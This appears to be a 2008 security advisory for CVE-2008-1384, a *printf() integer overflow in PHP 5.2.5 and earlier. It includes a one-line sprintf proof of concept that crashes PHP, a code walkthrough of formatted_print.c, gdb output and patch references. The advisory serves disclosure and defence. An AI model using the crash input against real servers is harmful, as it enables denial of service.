PHP 5.2.5 and prior : *printf() functions Integer Overflow

Published
Credit
Risk
2008.03.20
Maksymilian Arciemowicz
Medium
CWE
CVE
Local
Remote
CWE-189
CVE-2008-1384
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
5/10
2.9/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
None
None
Partial

[PHP 5.2.5 and prior : *printf() functions Integer Overflow ]

Author: Maksymilian Arciemowicz
- - Written: 01.03.2008
- - Public: 20.03.2008

CVE-2008-1384
Risk: Low

Affected Software: PHP 5.2.5 and prior
Vendor: http://www.php.net

- --- 0.Description ---
PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

These functions all manipulate strings in various ways. Some more specialized sections can be found in the regular expression and URL handling sections.

For information on how strings behave, especially with regard to usage of single quotes, double quotes, and escape sequences, see the Strings entry in the Types section of the manual.

- --- 1. *printf() functions Integer Overflow ---
The main problem exists in formatted_print.c file.

cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386
cxib# php -v
PHP 5.2.5 (cli) (built: Mar 13 2008 21:34:01) (DEBUG)
Copyright (c) 1997-2007 The PHP Group
Zend Engine v2.2.0, Copyright (c) 1998-2007 Zend Technologies
cxib# cat /www/printf.php
<?
sprintf("[%'A2147483646s]\n", "A");
?>
cxib# php /www/printf.php
Segmentation fault (core dumped)

Good. Let's see to formatted_print.c file in php_sprintf_appendstring() function

- ---formatted_print.c-start---
inline static void
php_sprintf_appendstring(char **buffer, int *pos, int *size, char *add,
int min_width, int max_width, char padding,
int alignment, int len, int neg, int expprec, int always_sign)
- ---formatted_print.c-end---

The main varible what we will see is "npad"


- ---formatted_print.c-start---
copy_len = (expprec ? MIN(max_width, len) : len);
npad = min_width - copy_len;
- ---formatted_print.c-end---

good. npad is 2147483646


- ---formatted_print.c-start---
req_size = *pos + MAX(min_width, copy_len) + 1;
- ---formatted_print.c-end---

req_size overflow

- ---formatted_print.c-start---
if (req_size > *size) {
while (req_size > *size) {
*size <<= 1;
}
PRINTF_DEBUG(("sprintf ereallocing buffer to %d bytes\n", *size));
*buffer = erealloc(*buffer, *size);
}
- ---formatted_print.c-end---

(req_size > *size) is False

(alignment == ALIGN_RIGHT) is True so

- ---formatted_print.c-start---
while (npad-- > 0) {
(*buffer)[(*pos)++] = padding;
}
- ---formatted_print.c-end---

and finish. Let's debug it with gdb

- --- Debug ---
0x08295ba5 in php_sprintf_appendstring (buffer=0xbfbfd318, pos=0xbfbfd31c,
size=0xbfbfd324, add=0x28f20404 'A' <repeats 200 times>...,
min_width=2147483646, max_width=0, padding=65 'A', alignment=1, len=1,
neg=0, expprec=0, always_sign=0)

...

0x290fff0c: 'A' <repeats 200 times>...
0x290fffd4: 'A' <repeats 44 times> <Error reading address 0x29100000: Bad address>
0x29100000: <Error reading address 0x29100000: Bad address>
- --- Debug ---

Script will alocated a lot of data to memory.

Tested on:
PHP 5.2.5
cxib# uname -a
FreeBSD cxib.laptop 7.0-RELEASE FreeBSD 7.0-RELEASE #0: Sun Feb 24 19:59:52 UTC 2008 root@logan.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC i386

and
PHP 5.1.6
someone@ultra ~ $ uname -a
NetBSD ultra 3.0.1 NetBSD 3.0.1 (GENERIC) #0: Fri Jul 14 03:47:28 UTC 2006
riz@b2.netbsd.org:/home/builds/ab/netbsd-3-0-1-RELEASE/sparc64/200607131826Z-obj/home/builds/ab/netbsd-3-0-1-RELEASE/src/sys/arch/sparc64/compile/GENERIC sparc64

- --- 2. Exploit ---
N/A

- --- 3. How to fix ---
CVS

http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup

- --- 4. Greets ---
Stanislav Malyshev (Patch)

- --- 5. Contact ---
Author: Maksymilian Arciemowicz

References:

http://www.ubuntu.com/usn/usn-628-1
http://www.mandriva.com/security/advisories?name=MDVSA-2009:023
http://www.mandriva.com/security/advisories?name=MDVSA-2009:022
http://www.debian.org/security/2008/dsa-1572
http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00001.html
http://cvs.php.net/viewvc.cgi/php-src/NEWS?revision=1.2027.2.547.2.1120&view=markup


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2016, cxsecurity.com